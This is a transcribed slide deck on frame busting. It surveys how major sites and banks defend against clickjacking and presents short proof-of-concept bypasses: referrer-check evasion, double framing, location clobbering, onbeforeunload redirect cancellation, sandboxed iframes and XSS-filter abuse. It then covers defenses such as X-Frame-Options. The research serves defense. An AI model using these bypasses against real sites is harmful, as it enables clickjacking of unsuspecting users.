what is frame busting what is frame busting
play

What is frame busting? What is frame busting? HTML allows for any - PowerPoint PPT Presentation

Apr 05, 2023 •19 likes •539 views

What is frame busting? What is frame busting? HTML allows for any site to frame any URL with an IFRAME (internal frame) <iframe src=http://www.google.com> Ignored by most browsers </iframe> What is frame busting?

  2. What is frame busting?

  3. What is frame busting? HTML allows for any site to frame any URL with an IFRAME • (internal frame) <iframe src=“http://www.google.com”> Ignored by most browsers </iframe>

  4. What is frame busting? • Frame busting are techniques for preventing framing by the framed site.

  5. What is framebusting? Common frame busting code is made up of: • a conditional statement • a counter action if (top != self) { top.location = self.location; }

  6. Why frame busting?

  7. Primary: Clickjacking Jeremiah Grossman and Robert Hansen, 2008

  8. Clickjacking 2.0 (Paul Stone, BHEU ‘10) Utilizing drag and drop: Grab data off the page (including source code, form data) Get data into the page (forms etc.) Fingerprint individual objects in the framed page

  9. Survey • Idea: Grab frame busting from Alexa Top-500 and all US banks. Analyze code. • Used semi-automated crawler based on HTMLUnit. • Manual work to trace through obfuscated and packed code.

  10. Obfuscation/Packing 

  11. Survey Sites Framebusting Top 10 60% Top 100 37% Top 500 14%

  12. Survey Conditional Statements if (top != self) if (top.location != self.location) if (top.location != location) if (parent.frames.length > 0) if (window != top) if (window.top !== window.self) if (window.self != window.top) if (parent && parent != window) if (parent && parent.frames && parent.frames.length>0) if((self.parent&& !(self.parent===self))&& (self.parent.frames.length!=0))

  13. Counter-Action Statements top.location = self.location top.location.href = document.location.href top.location.href = self.location.href top.location.replace(self.location) top.location.href = window.location.href top.location.replace(document.location) top.location.href = window.location.href top.location.href = "URL" document.write(’’) top.location = location top.location.replace(document.location) top.location.replace(’URL’) top.location.href = document.location top.location.replace(window.location.href) top.location.href = location.href self.parent.location = document.location parent.location.href = self.document.location top.location.href = self.location top.location = window.location top.location.replace(window.location.pathname) window.top.location = window.self.location setTimeout(function(){document.body.innerHTML=’’;},1); window.self.onload = function(evt){document.body.innerHTML=’’;} var url = window.location.href; top.location.replace(url)

  14. All frame busting code we found was broken.

  15. Let’s check out some code.

  16. Courtesy of Walmart if (top.location != location) { if(document.referrer && document.referrer.indexOf("walmart.com") == -1) { top.location.replace(document.location.href); } }

  17. Error in Referrer Checking From http://www.attacker.com/walmart.com.html <iframe src=“http://www.walmart.com”> Limit use of indexOf()…

  18. Courtesy of if (window.self != window.top && !document.referrer.match( /https?:\/\/[^?\/]+\.nytimes\.com\//)) { self.location = top.location; }

  19. Error in Referrer Checking From http://www.attacker.com/a.html?b=https://www.nytimes.com/ <iframe src=“http://www.nytimes.com”> Anchor your regular expressions.

  20. Courtesy of if (self != top) { var domain = getDomain (document.referrer); var okDomains = /usbank|localhost|usbnet/; var matchDomain = domain.search (okDomains); if (matchDomain == -1) { //frame bust } }

  21. Error in Referrer Checking From http://usbank.attacker.com/ <iframe src=“http://www.usbank.com”> Don’t make your regular expressions too lax.

  22. Strategic Relationship? Norweigan State House Bank http://www.husbanken.no

  23. Strategic Relationship? Bank of Moscow http://www.rusbank.org

  24. Courtesy of try{ A=!top.location.href }catch(B){} A=A&& !(document.referrer.match(/^https?:\/\/[-az09.] *\.google\.(co\.|com\.)? [a-z] +\/imgres/i))&& !(document.referrer.match(/^https?:\/\/([^\/]*\.)? (myspace\.com| myspace\.cn| simsidekick\.com| levisawards\.com| digg\.com)\//i)); if(A){ //Framebust }

  25. The people you trust might not frame bust Google Images does not framebust.

  26. Referrer = Funky Stuff Many attacks on referrer: washing/changing Open redirect referrer changer HTTPS->HTTP washing Can be hard to get regular expression right (apparently) “Friends” cannot be trusted

  27. Facebook Dark Layer

  28. Courtesy of Facebook Facebook deploys an exotic variant: • if (top != self) { try { if (top.location.hostname.indexOf("apps") >= 0) throw 1; } catch (e) { window.document.write("<div style= 'background: black; opacity: 0.5; filter: alpha(opacity = 50); position: absolute; top: 0px; left: 0px; width: 9999px; height: 9999px; z-index: 1000001' onClick='top.location.href=window.location.href'> </div>"); } }

  29. Facebook – Ray of Light! All Facebook content is centered! We can push the content into the ray of light outside of the div. <iframe width=“21800px” height=”2500px” src =“http://facebook.com”> <script> window.scrollTo(10200, 0 ) ; </script>

  30. Facebook – Ray of Light!

  31. Let’s move on to some generic attacks!

  32. Courtesy of many if(top.location != self.location) { parent.location = self.location; }

  33. Double Framing! framed1.html framed2.html <iframe src=“fframed2.html”> <iframe src=“victim.com”>

  34. Descendent Policy Introduced in Securing frame communication in browsers . • (Adam Barth, Collin Jackson, and John Mitchell. 2009) Descendant Policy A frame can navigate only it’s decedents. framed1.html framed2.html top.location = self.location is always okay. <iframe src=“fframed2.html”> <iframe src=“victim.com”>

  35. Location Clobbering if (top.location != self.location) { top.location = self.location; } If top.location can be changed or disabled this code is useless. But our trusted browser would never let such atrocities happen… right?

  36. Location Clobbering IE 7: IE 7: var location = “clobbered”; Safari: window.__defineSetter__("location", function(){}); top.location is now undefined.  http://code.google.com/p/ browsersec/wiki/Part2#Arbitrary_ page_mashups_(UI_redressing)

  37. Asking Nicely • User can manually cancel any redirection attempt made by framebusting code. • Attacker just needs to ask… <script> window.onbeforeunload = function() { return ”Do you want to leave PayPal?"; } </script> <iframe src="http://www.paypal.com">

  38. Asking Nicely

  39. Not Asking Nicely • Actually, we don’t have to ask nicely at all. Most browser allows to cancel the relocation “programmatically”. var prevent_bust = 0 window.onbeforeunload = function() {kill_bust++ } setInterval(function() { if (kill_bust > 0) { kill_bust -= 2; window.top.location = 'http://no-content-204.com' } }, 1); <iframe src="http://www.victim.com"> http://coderrr.wordpress.com/2009/02/13/preventing-frame-busting-and-click-jacking-ui-redressing

  40. Restricted zones • IE 8: <iframe security=“restricted” src=“http://www.victim.com”> Javascript and Cookies disabled • Chrome (HTML5): <iframe sandbox src=“http://www.victim.com”> Javascript disabled (cookies still there) • IE 8 and Firefox: designMode = on (Paul Stone BHEU’10) Javascript disabled (more cookies) However, since cookies are disabled, many

  41. Reflective XSS filters • Internet Explorer 8 introduced reflective XSS filters: http://www.victim.com?var=<script> alert(‘xss’) If <script> alert(‘xss’); appears in the rendered page, the filter will replace it with <sc#pt> alert (‘xss’)

  42. Reflective XSS filters Can be used to target frame busting (Eduardo Vela ’09) Original <script> if(top.location != self.location) //framebust </ script> Request > http://www.victim.com?var=<script> if (top Rendered <sc#pt> if(top.location != self.location) Chrome’s XSS auditor, same problem.

  43. Is there any hope? Well, sort of…

  44. X-Frames-Options (IE8) • HTTP header sent on responses • Two possible values: DENY and SAMEORIGIN • On DENY, will not render in framed context. • On SAMEORIGIN, only render if top frame is same origin as page giving directive.

  45. X-Frames-Options • Good adoption by browsers (all but Firefox, coming in 3.7) • Poor adoption by sites (4 out of top 10,000, survey by sans.org) • Some limitations: per-page policy, no whitelisting, and proxy problems.

  46. Content Security Policy (FF) • Also a HTTP-Header. • Allows the site to specific restrictions/ abilities. • The frame-ancestors directive can specifiy allowed framers. • Still in beta, coming in Firefox 3.7

  47. Best for now (but still not good) <style>html { visibility: hidden }</style> <script> if (self == top) { document.documentElement.style.visibility = 'visible'; } else { top.location = self.location; } </script>

  48. … a little bit more. These sites (among others) do framembusting…

  49. … a little bit more. … but do these?

Recommend

Myth Busting Cybe r Cla ims T he r e is mor e tha n one wa y to ma na ge a c ybe r c

Myth Busting Cybe r Cla ims T he r e is mor e tha n one wa y to ma na ge a c ybe r c

Myth Busting Cybe r Cla ims T he r e is mor e tha n one wa y to ma na ge a c ybe r c la im Spo nso re d By: Myth Busting Cybe r Cla ims T he re is more tha n one wa y to ma na g e a c ybe r c la im Visit www.a dvise

387 views • 21 slides
Surfin ng the f frame n et A frame is a complex condition on its

Surfin ng the f frame n et A frame is a complex condition on its

1. Frames 2. Shifting 3. Metonymy 4. Word formation 5. Conclusion 2 Whats a frame? Surfin ng the f frame n et A frame is a complex condition on its potential

162 views • 13 slides
Deck Deck Frame Frame DeckFrame Deck Frame is the utilization of VP Buildings

Deck Deck Frame Frame DeckFrame Deck Frame is the utilization of VP Buildings

Deck Deck Frame Frame DeckFrame Deck Frame is the utilization of VP Buildings economical materials combined with conventional B deck materials To be utilized with any type lightweight non-metal roofing system

215 views • 17 slides
Frame Relay Topologies and Designs Frame Relay Topologies and Design As we learned in the Frame

Frame Relay Topologies and Designs Frame Relay Topologies and Design As we learned in the Frame

Frame Relay Topologies and Designs Frame Relay Topologies and Design As we learned in the Frame Relay - Introduction and Concepts lesson, Frame Relay introduces some cost savings benefits over point-to-point leased lines. This lesson will

396 views • 14 slides
degrees 0 20 0 20 40 500 10 20 30 40 50 10 20 30 40 50 frame frame RMS

degrees 0 20 0 20 40 500 10 20 30 40 50 10 20 30 40 50 frame frame RMS

estimated camera position estimated camera rotation 500 80 60 40 degrees 0 20 0 20 40 500 10 20 30 40 50 10 20 30 40 50 frame frame RMS errors using prev (:) vs. model ( ) 60 50 RMS intensity error 40 30 20

717 views • 23 slides
Bias Busting Across the Center: A Model to Interrupt Bias and Promote Inclusion Modeled on

Bias Busting Across the Center: A Model to Interrupt Bias and Promote Inclusion Modeled on

Bias Busting Across the Center: A Model to Interrupt Bias and Promote Inclusion Modeled on Googles BiasBusting@Work and Carnegie Mellons Bias Busters @ CMU Learning Outcomes Understand the role that biases play, positively &amp;

637 views • 34 slides
S&amp;OP to IBP Busting the myth December 13th, 2017 Basel, Switzerland Ieke le Blanc

S&amp;OP to IBP Busting the myth December 13th, 2017 Basel, Switzerland Ieke le Blanc

S&amp;OP to IBP Busting the myth December 13th, 2017 Basel, Switzerland Ieke le Blanc Mentimeter 3. Enter the code 1. Grab your phone 2. Go to www.menti.com 10 09 84 and vote! 2 How would you describe IBP in three words? 3 S&amp;OP and

371 views • 22 slides
The Search for Answers Myth busting lessons for those creating new fuels from oil shale Myth:

The Search for Answers Myth busting lessons for those creating new fuels from oil shale Myth:

The Search for Answers Myth busting lessons for those creating new fuels from oil shale Myth: Oil is becoming less important Fact: Countries continue to strive to grow their economies... 14,000 USA 12,000 GDP (USD Billion PPP) 10,000

626 views • 20 slides
&quot;Lessons from Busting Organizational Silos&quot; Presented by: Tricia Broderick Santeon

&quot;Lessons from Busting Organizational Silos&quot; Presented by: Tricia Broderick Santeon

AT9 Concurrent Session 11/14/2013 3:45 PM &quot;Lessons from Busting Organizational Silos&quot; Presented by: Tricia Broderick Santeon Group Brought to you by: 340 Corporate Way, Suite 300, Orange Park, FL 32073 888 268 8770 904

575 views • 22 slides
Broker Busting B.A.S.I.C.s Making Our Highways Safer By Taking Trucking Cases Beyond

Broker Busting B.A.S.I.C.s Making Our Highways Safer By Taking Trucking Cases Beyond

Broker Busting B.A.S.I.C.s Making Our Highways Safer By Taking Trucking Cases Beyond The Driver And Motor Carrier To The Negligent Brokers Who Hire Them B. Keith Williams, Esq. with James R. Stocks, Esq. Keith Williams Law Group

292 views • 25 slides
Neighbourhood Planning Neighbourhood Planning W hat I w ill cover Myth busting the

Neighbourhood Planning Neighbourhood Planning W hat I w ill cover Myth busting the

Neighbourhood Planning Neighbourhood Planning W hat I w ill cover Myth busting the facts What are the challenges of developing a Neighbourhood Plan in Leeds? What is your role? What is the Councils role? Is a

290 views • 10 slides
Busting those myths! Gill Jones HMI Deputy Director, Education Policy @GillJonesOfsted May 2018

Busting those myths! Gill Jones HMI Deputy Director, Education Policy @GillJonesOfsted May 2018

Busting those myths! Gill Jones HMI Deputy Director, Education Policy @GillJonesOfsted May 2018 West Midlands, Ofsted Big Conversation May 2018 Slide 1 https://www.gov.uk/government/publications/inspecting-

719 views • 26 slides
Barrier Busting Task Force Background Formed in October 2017 in response to Broadband S

Barrier Busting Task Force Background Formed in October 2017 in response to Broadband S

Barrier Busting Task Force Background Formed in October 2017 in response to Broadband S takeholder Group report into barriers to deployment of infrastructure. Aim is to make it as cheap, quick and easy to deploy infrastructure as

202 views • 18 slides
Run Any Software in a Browser NVIDIA GTC, April 7, 2016 What is Frame? Frame is a secure cloud

Run Any Software in a Browser NVIDIA GTC, April 7, 2016 What is Frame? Frame is a secure cloud

Run Any Software in a Browser NVIDIA GTC, April 7, 2016 What is Frame? Frame is a secure cloud platform that lets organizations deliver amazing experiences and workflows to users on all connected devices . Pixels user input Confidential Why

540 views • 21 slides
Frame Relay Basic Configurations: Hub and Spoke Frame Relay Basic Hub and Spoke Configuration

Frame Relay Basic Configurations: Hub and Spoke Frame Relay Basic Hub and Spoke Configuration

Frame Relay Basic Configurations: Hub and Spoke Frame Relay Basic Hub and Spoke Configuration While we still have more lessons left to fully cover the major aspects of Frame Relay and its configuration, I wanted to include a couple of short,

435 views • 14 slides
Statistical Models for Frame-Semantic Parsing Dipanjan Das * Google Frame Semantics in NLP: A

Statistical Models for Frame-Semantic Parsing Dipanjan Das * Google Frame Semantics in NLP: A

Statistical Models for Frame-Semantic Parsing Dipanjan Das * Google Frame Semantics in NLP: A Workshop in Honor of Chuck Fillmore June 27, 2014 * Thanks to Desai Chen, Kuzman Ganchev, Karl Moritz Hermann, Andr Martins, Nathan Schneider, Noah

1.63k views • 152 slides
Grammar Implementation with Lexicalized Tree Adjoining Grammars and Frame Semantics Frame

Grammar Implementation with Lexicalized Tree Adjoining Grammars and Frame Semantics Frame

Grammar Implementation with Lexicalized Tree Adjoining Grammars and Frame Semantics Frame semantics Laura Kallmeyer, Timm Lichte, Rainer Osswald &amp; Simon Petitjean University of Dsseldorf DGfS CL Fall School, September 14, 2017 SFB 991

1.47k views • 136 slides
Busting Myths about Renewable Energy How to achieve 100% renewable electricity Dr Mark

Busting Myths about Renewable Energy How to achieve 100% renewable electricity Dr Mark

SPREE, UNSW Sydney, 13 September 2018 Busting Myths about Renewable Energy How to achieve 100% renewable electricity Dr Mark Diesendorf Honorary Associate Professor UNSW Sydney Email: m.diesendorf@unsw.edu.au Web:

565 views • 30 slides
Frame Relay Basic Configurations: Point to Point Frame Relay Basic Point to Point Configuration

Frame Relay Basic Configurations: Point to Point Frame Relay Basic Point to Point Configuration

Frame Relay Basic Configurations: Point to Point Frame Relay Basic Point to Point Configuration While we still have more lessons left to fully cover the major aspects of Frame Relay and its configuration, I wanted to include a couple of short,

325 views • 11 slides
Busting Development Industry Myths City of Melton Luke Shannon General Manager Planning &amp;

Busting Development Industry Myths City of Melton Luke Shannon General Manager Planning &amp;

Busting Development Industry Myths City of Melton Luke Shannon General Manager Planning &amp; Development 23 rd October 2019 Introduction City of Melton has nine approved precinct structure plans, with just over 5,000ha of active NDA A

225 views • 10 slides
BUSTING PESTICIDE MYTHS AND OTHER TALL TALES Luke Goembel, Ph.D. Legislative Vice Chair, Central

BUSTING PESTICIDE MYTHS AND OTHER TALL TALES Luke Goembel, Ph.D. Legislative Vice Chair, Central

BUSTING PESTICIDE MYTHS AND OTHER TALL TALES Luke Goembel, Ph.D. Legislative Vice Chair, Central Maryland Beekeepers Association Sierra Club 2017 Maryland Jamboree Oct. 14, 9:15 am PRE-QUIZ: LOOK FOR ANSWERS Please do not yell out answers

639 views • 19 slides
RE-FRAME LET'S MAKE A CLOCK (WOW!) TO UNDERSTAND RE-FRAME, YOU MUST BE ABLE TO LIVE WITHOUT IT.

RE-FRAME LET'S MAKE A CLOCK (WOW!) TO UNDERSTAND RE-FRAME, YOU MUST BE ABLE TO LIVE WITHOUT IT.

RE-FRAME LET'S MAKE A CLOCK (WOW!) TO UNDERSTAND RE-FRAME, YOU MUST BE ABLE TO LIVE WITHOUT IT. BOOT https://github.com/boot-clj/boot BOOT TEMPLATES boot -d seancorfield/boot-new new -t tenzing -n &lt;name&gt; [+a &lt;option&gt;]* $ cd

566 views • 22 slides
Frame Relay Bigger, Longer, Uncut 2005/03/11 (C) Herbert Haas What is Frame Relay?

Frame Relay Bigger, Longer, Uncut 2005/03/11 (C) Herbert Haas What is Frame Relay?

Frame Relay Bigger, Longer, Uncut 2005/03/11 (C) Herbert Haas What is Frame Relay? Connection-oriented packet switching (Virtual Circuit) WAN Technology Specifies User to Network Interface (UNI) Does not not specify network

787 views • 53 slides
* A ten frame is a simple five by two grid, used as a tool to help a child create a visual image of

* A ten frame is a simple five by two grid, used as a tool to help a child create a visual image of

* Ten Frames Mrs. s. D. Br Brow own First Grade * A ten frame is a simple five by two grid, used as a tool to help a child create a visual image of a number in his or her mind. Initially, a child will use a ten frame (or five frame) in

368 views • 15 slides

More recommend